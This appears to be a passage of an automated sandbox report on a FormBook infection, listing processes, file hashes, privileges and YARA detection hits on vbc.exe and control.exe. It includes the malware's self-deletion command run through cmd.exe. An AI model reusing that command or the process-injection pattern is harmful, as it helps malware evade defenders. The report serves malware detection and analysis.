                                                                            File size:185856 bytes
                                                                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:21:03:39
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6b2800000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:21:03:40
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:{path}
                                                                            Imagebase:0x8a0000
                                                                            File size:2688096 bytes
                                                                            MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate

                                                                            General

                                                                            Start time:21:03:41
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:{path}
                                                                            Imagebase:0x8a0000
                                                                            File size:2688096 bytes
                                                                            MD5 hash:B3A917344F5610BEEC562556F11300FA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.275355195.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.275608488.0000000004B90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:moderate

                                                                            General

                                                                            Start time:21:03:44
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:
                                                                            Imagebase:0x7ff714890000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:21:03:56
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\SysWOW64\control.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\control.exe
                                                                            Imagebase:0xb80000
                                                                            File size:114688 bytes
                                                                            MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.572301270.0000000003250000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.572093370.0000000003220000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:moderate

                                                                            General

                                                                            Start time:21:04:00
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
                                                                            Imagebase:0x200000
                                                                            File size:232960 bytes
                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:21:04:01
                                                                            Start date:13/01/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6b2800000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Reset < >